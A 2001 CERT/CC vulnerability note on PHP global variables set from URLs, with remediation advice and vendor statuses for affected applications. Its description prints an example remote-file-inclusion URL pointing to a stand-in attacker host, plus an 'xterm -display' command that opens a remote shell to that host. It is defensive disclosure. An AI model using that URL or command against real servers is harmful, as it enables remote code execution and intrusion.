search menu icon-carat-right cmu-wordmark

CERT Coordination Center

Php variables passed from the browser are stored in global context

Vulnerability Note VU#847803

Original Release Date: 2001-10-18 | Last Revised: 2001-10-22

Overview

Php is a dynamic scripting language used by programmers to develop webservers, message boards, chat applications and a variety of programs. By default php stores variables passed from the URL in a global context. Programmers often fail to change this setting which can allow serious vulnerabilities to surface. Often intruders can exploit the vulnerabilities created by this failure to gain administrative rights to the application or server, manipulate data, and execute arbitrary php code.

Description

Some applications written in php fail to follow proper programming practices. Global variables are used to store sensitive data, and can subsequently be altered by an intruder to gain access to the system. Often programmers use global variables to store account names, passwords and permission settings. An intruder can easily use crafted URLs to change the values in these global variables and compromise the system as demonstrated by VU#314347. Another example that can lead to a more severe impact is the manipulation of php variables related to source code locations. Assume that there is a file not directly accessed by the browser, but is included by the server from somewhere else called includefile.php. It may be included by the file function.php that contains the line

include("$includedir/includefile.php");

If the global variable $includedir is not set in each document that contains the include statement to be executed, then we can overwrite $includedir with a crafted URL like

http://vulnerable.example.com/function.php?includedir=http://evil-host.example.com/code

When the script is executed on vulnerable.example.com the php interpreter will fetch the file http://evil-host.example.com/code/includefile.php and execute it. This file can contain php code that downloads binaries, executes code, or starts a shell (e.g. "xterm -display evil-host.example.com:1")...). This source will be executed with the same privileges as the running webserver..

Impact

Intruders can exploit these vulnerabilities to gain administrative rights to the application or server, manipulate data, and execute arbitrary php code.

Solution

Disable global variables from the URL/client. Best programming practices are to not use global variables if at all possible. Do not permit the execution of code that does not originate from the webserver. If you need to use global variables, set variables_order = "egcps" in php.ini and set the value of every global variable in every file that the global variable is used.

Vendor Information

847803
 
Affected   Unknown   Unaffected

Grant Horwood

Notified:  October 15, 2001 Updated:  October 15, 2001

Status

  Vulnerable

Vendor Statement

The cause of the arbitrary code execution bug in webodex is the library adodb written by John Lim. Webodex uses an older version of this library as the webodex is essentially "mothballed". A new version of adodb is available that plugs this bug and i will be updating webodex late this evening.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

John Lim

Updated:  October 16, 2001

Status

  Vulnerable

Vendor Statement

From the Change log:

"1.12 6 June 2001

Changed $ADODB_DIR to ADODB_DIR constant to plug a security loophole."

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

John Lim wrote ADODB which was vulnerable to this problem.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Marc Logemann

Notified:  October 15, 2001 Updated:  October 17, 2001

Status

  Vulnerable

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

Marc Logemann wrote More.groupware which is reported to be vulnerable.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Miro Construct Pty. Ltd.

Notified:  October 15, 2001 Updated:  October 16, 2001

Status

  Vulnerable

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

Miro Construct Pty Ltd produces Mambo Site Server. Versions earlier than 3.0.5 are vulnerable. This is fixed in 3.0.6.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Zorbat

Notified:  October 15, 2001 Updated:  October 22, 2001

Status

  Vulnerable

Vendor Statement

Corrected in release zorbstats 0.9

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.


CVSS Metrics

Group Score Vector
Base N/A N/A
Temporal N/A N/A
Environmental N/A

References

Acknowledgements

Our thanks to atil <bugtraq@jakob.weite-welt.com> and genetics <veenstra@chello.nl> for the information contained in their posting to BugTraq.

This document was written by Jason Rafail.

Other Information

CVE IDs: None
Severity Metric: 17.53
Date Public: 2001-07-25
Date First Published: 2001-10-18
Date Last Updated: 2001-10-22 14:22 UTC
Document Revision: 32

Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.